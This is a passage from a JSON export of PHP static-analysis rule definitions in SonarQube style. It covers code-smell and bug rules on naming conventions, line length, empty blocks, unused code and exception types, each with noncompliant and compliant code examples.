*\/\nfunction myFunc(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the function names against","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S101","repo":"php","name":"Class names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all class\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass my_class {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the class names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S103","repo":"php","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"120","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S105","repo":"php","name":"Tabulation characters should not be used","htmlDesc":"<p>Developers should not need to configure the tab width of their text editors in order to be able to read source code.<\/p>\n<p>So the use of tabulation character must be banned.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1066","repo":"php","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n if (condition2) {\n ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1 && condition2) {\n ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1067","repo":"php","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&&<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif ((($condition1 && $condition2) || ($condition3 && $condition4)) && $condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ( (my_first_condition() || my_second_condition()) && my_last_condition()) { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1068","repo":"php","name":"Unused \"private\" fields should be removed","htmlDesc":"<p>If a <code>private<\/code> field is declared but not used in the program, it can be considered dead code and should therefore be removed. This will\nimprove maintainability because developers will not wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass {\n private $foo = 4; \/\/foo is unused\n\n public function compute($a) {\n return $a * 4;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n\n public function compute($a) {\n return $a * 4;\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S107","repo":"php","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4, $param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"},{"key":"constructorMax","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S108","repo":"php","name":"Nested blocks of code should not be left empty","htmlDesc":"<p>Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i < 42; $i++){} \/\/ Empty on purpose or missing piece of code ?\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, this block is not considered to be empty.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1105","repo":"php","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (left and right curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1109","repo":"php","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition) {\n doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1116","repo":"php","name":"Empty statements should be removed","htmlDesc":"<p>Empty statements, i.e. <code>;<\/code>, are usually introduced by mistake, for example because:<\/p>\n<ul>\n <li> It was meant to be replaced by an actual statement, but this was forgotten. <\/li>\n <li> There was a typo which lead the semicolon to be doubled, i.e. <code>;;<\/code>. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n ; \/\/ Noncompliant - was used as a kind of TODO marker\n}\n\nfunction doSomethingElse($p) {\n echo $p;; \/\/ Noncompliant - double ;\n}\n\nfor ($i = 1; $i <= 10; doSomething($i), $i++); \/\/ Noncompliant - Rarely, they are used on purpose as the body of a loop. It is a bad practice to have side-effects outside of the loop body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething() {}\n\nfunction doSomethingElse($p) {\n echo $p;\n\n for ($i = 1; $i <= 10; $i++) {\n doSomething($i);\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment provided that\n the first character following the null statement is a white-space character. <\/li>\n <li> MISRA C++:2008, 6-2-3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment, provided\n that the first character following the null statement is a white-space character. <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7gCTAw\">CERT, MSC51-J.<\/a> - Do not place a semicolon immediately following an if, for,\n or while condition <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/i4FtAg\">CERT, EXP15-C.<\/a> - Do not place a semicolon on the same line as an if, for,\n or while statement <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1117","repo":"php","name":"Local variables should not have the same name as class fields","htmlDesc":"<p>Shadowing fields with a local variable is a bad practice that reduces code readability: it makes it confusing to know whether the field or the\nvariable is being used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n public $myField;\n\n public function doSomething() {\n $myField = 0;\n ...\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/2ADEAw\">CERT, DCL51-J.<\/a> - Do not shadow or obscure identifiers in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S112","repo":"php","name":"Generic exceptions ErrorException, RuntimeException and Exception should not be thrown","htmlDesc":"<p>If you throw a general exception type, such as ErrorException, RuntimeException, or Exception in a library or framework, it forces consumers to\ncatch all exceptions, including unknown exceptions that they do not know how to handle.<\/p>\n<p>Instead, either throw a subtype that already exists in the Standard PHP Library, or create your own type that derives from Exception.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthrow new Exception(); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nthrow new InvalidArgumentException();\n\/\/ or\nthrow new UnexpectedValueException();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/397.html\">MITRE, CWE-397<\/a> - Declaration of Throws for Generic Exception <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/BoB3AQ\">CERT, ERR07-J.<\/a> - Do not throw RuntimeException, Exception, or Throwable\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1124","repo":"php","name":"Modifiers should be declared in the correct order","htmlDesc":"<p>The PSR2 standard recommends listing modifiers in the following order to improve the readability of PHP source code:<\/p>\n<ol>\n <li> final or abstract <\/li>\n <li> public or protected or private <\/li>\n <li> static <\/li>\n<\/ol>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstatic protected $foo;\n...\npublic static final function bar(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprotected static $foo;\n...\nfinal public static function bar(){...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1125","repo":"php","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($booleanVariable == true) { \/* ... *\/ }\nif ($booleanVariable != true) { \/* ... *\/ }\nif ($booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n\n$booleanVariable = condition ? true : exp;\n$booleanVariable = condition ? false : exp;\n$booleanVariable = condition ? exp : true;\n$booleanVariable = condition ? exp : false;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($booleanVariable) { \/* ... *\/ }\nif (!$booleanVariable) { \/* ... *\/ }\nif ($booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n\n$booleanVariable = condition || exp;\n$booleanVariable = !condition && exp;\n$booleanVariable = !condition || exp;\n$booleanVariable = condition && exp;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1126","repo":"php","name":"Return of boolean expressions should not be wrapped into an \"if-then-else\" statement","htmlDesc":"<p>Return of boolean literal statements wrapped into <code>if-then-else<\/code> ones should be simplified.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (expression) {\n return true;\n} else {\n return false;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn expression;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S113","repo":"php","name":"Files should contain an empty new line at the end","htmlDesc":"<p>Some tools such as Git work better when files end with an empty line.<\/p>\n<p>This rule simply generates an issue if it is missing.<\/p>\n<p>For example, a Git diff looks like this if the empty line is missing at the end of the file:<\/p>\n<pre>\n+class Test {\n+}\n\\ No newline at end of file\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1131","repo":"php","name":"Lines should not end with trailing whitespaces","htmlDesc":"<p>Trailing whitespaces are simply useless and should not stay in code. They may generate noise when comparing different versions of the same\nfile.<\/p>\n<p>If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the\nopportunity to do so. <\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1134","repo":"php","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide($numerator, $denominator) {\n return $numerator \/ $denominator; \/\/ FIXME denominator value might be 0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1135","repo":"php","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S114","repo":"php","name":"Interface names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all\ninterface names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\ninterface myInterface {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ninterface MyInterface {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the interface names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1142","repo":"php","name":"Functions should not contain too many return statements","htmlDesc":"<p>Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a\nreturn statement is encountered. This makes it harder to read and understand the logic of the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction myFunction(){ \/\/ Noncompliant as there are 4 return statements\n if (condition1) {\n return true;\n } else {\n if (condition2) {\n return false;\n } else {\n return true;\n }\n }\n return false;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed return statements per function","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1144","repo":"php","name":"Unused \"private\" methods should be removed","htmlDesc":"<p><code>private<\/code> methods that are never executed are dead code: unnecessary, inoperative code that should be removed. Cleaning out dead code\ndecreases the size of the maintained codebase, making it easier to understand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n private function Foo() {} \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n public static function doSomething()\n {\n $foo = new Foo();\n ...\n }\n\n private function unusedPrivateFunction() { \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n private function Foo(){} \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n public static function doSomething()\n {\n $foo = new Foo();\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1145","repo":"php","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n <li> Some value was left unset. <\/li>\n <li> Some logic is not doing what the programmer thought it did. <\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true) { \/\/ Noncompliant\n doSomething();\n}\n...\nif (false) { \/\/ Noncompliant\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomething();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S115","repo":"php","name":"Constant names should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. This rule checks that all constant names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$<\/code>:<\/p>\n<pre>\ndefine(\"const1\", true);\n\nclass Foo {\n const const2 = \"bar\";\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndefine(\"CONST1\", true);\n\nclass Foo {\n const CONST2 = \"bar\";\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the constant names against.","defaultValue":"^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1151","repo":"php","name":"\"switch case\" clauses should not have too many lines","htmlDesc":"<p>The <code>switch<\/code> statement should be used only to clearly define some new branches in the control flow. As soon as a <code>case<\/code>\nclause contains too many statements this highly decreases the readability of the overall control flow statement. In such case, the content of the\n<code>case<\/code> clause should be extracted into a dedicated method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 5:<\/p>\n<pre>\nswitch ($var) {\n case 0: \/\/ 6 lines till next case\n methodCall1();\n methodCall2();\n methodCall3();\n methodCall4();\n break;\n default:\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($var) {\n case 0:\n doSomething();\n break;\n default:\n break;\n}\n\nfunction doSomething(){\n methodCall1(\"\");\n methodCall2(\"\");\n methodCall3(\"\");\n methodCall4(\"\");\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of lines","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S116","repo":"php","name":"Field names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that field\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass MyClass {\n $my_field;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n $myField;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the field names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S117","repo":"php","name":"Local variable and function parameter names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all local\nvariable and function parameter names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\npublic function doSomething($my_param){\n $LOCAL;\n ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function doSomething($myParam){\n $local;\n ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1172","repo":"php","name":"Unused function parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the value passed to such parameters is, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething($a, $b) { \/\/ \"$a\" is unused\n return compute($b);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($b) {\n return compute($b);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Functions in classes that override a class or implement interfaces are ignored.<\/p>\n<pre>\nclass C extends B {\n\n function doSomething($a, $b) { \/\/ no issue reported on $b\n compute($a);\n }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. <\/li>\n <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1185","repo":"php","name":"Overriding methods should do more than simply call the same method in the super class","htmlDesc":"<p>Overriding a method just to call the same method from the super class without performing any other actions is useless and misleading. The only time\nthis is justified is in <code>final<\/code> overriding methods, where the effect is to lock in the parent class behavior. This rule ignores such\noverrides of <code>equals<\/code>, <code>hashCode<\/code> and <code>toString<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Child extends Parent {\n\n public function func($n,$m) {\n parent::func($n$m); \/\/ Noncompliant\n }\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Child extends Parent {\n\n public function func($n,$m) {\n parent::func($n$m);\n \/\/ do additional things...\n }\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Child extends Parent {\n \/\/ function eliminated\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1192","repo":"php","name":"String literals should not be duplicated","htmlDesc":"<p>Duplicated string literals make the process of refactoring error-prone, since you must be sure to update all occurrences.<\/p>\n<p>On the other hand, constants can be referenced from many places, but only need to be updated in a single place.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction run() {\n prepare('action1'); \/\/ Non-Compliant - 'action1' is duplicated 3 times\n execute('action1');\n release('action1');\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nACTION_1 = 'action1';\n\nfunction run() {\n prepare(ACTION_1);\n execute(ACTION_1);\n release(ACTION_1);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>To prevent generating some false-positives, literals having less than 5 characters are excluded.<\/p>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"threshold","htmlDesc":"Number of times a literal must be duplicated to trigger an issue","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1200","repo":"php","name":"Classes should not be coupled to too many other classes (Single Responsibility Principle)","htmlDesc":"<p>According to the Single Responsibility Principle, introduced by Robert C. Martin in his book \"Principles of Object Oriented Design\", a class should\nhave only one responsibility:<\/p>\n<blockquote>\n <p>If a class has more than one responsibility, then the responsibilities become coupled.<\/p>\n <p>Changes to one responsibility may impair or inhibit the class' ability to meet the others.<\/p>\n <p>This kind of coupling leads to fragile designs that break in unexpected ways when changed.<\/p>\n<\/blockquote>\n<p>Classes which rely on many other classes tend to aggregate too many responsibilities and should be split into several smaller ones.<\/p>\n<p>Nested classes dependencies are not counted as dependencies of the outer class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n class Foo { \/\/ Noncompliant - Foo depends on too many classes: T1, T2, T3, T4, T5, T6 and T7\n \/**\n * @var T1\n *\/\n public $a1; \/\/ Foo is coupled to T1\n \/**\n * @var T2\n *\/\n protected $a2; \/\/ Foo is coupled to T2\n \/**\n * @var T3\n *\/\n private $a3; \/\/ Foo is coupled to T3\n\n \/**\n * @param T5\n * @param T6\n *\n * @return T4\n *\/\n public function compute(T5 $a, $b) { \/\/ Foo is coupled to T4, T5 and T6\n $result = new T7(); \/\/ Foo is coupled to T7\n return $result;\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of classes a single class is allowed to depend upon","defaultValue":"20","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S121","repo":"php","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seems to be attached to the if statement, but that is only true for the first one:\nif (condition)\n executeSomething();\n checkSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {\n executeSomething();\n checkSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S122","repo":"php","name":"Statements should be on separate lines","htmlDesc":"<p>For better readability, do not put more than one statement on a single line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(someCondition) doSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(someCondition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Anonymous functions containing a single statement are ignored.<\/p>\n<pre>\n$max_comparator = function ($v) { return $v > 2; }; \/\/ Compliant\n$max_comparator = function ($v) { echo $v; return $v > 2; }; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S125","repo":"php","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. 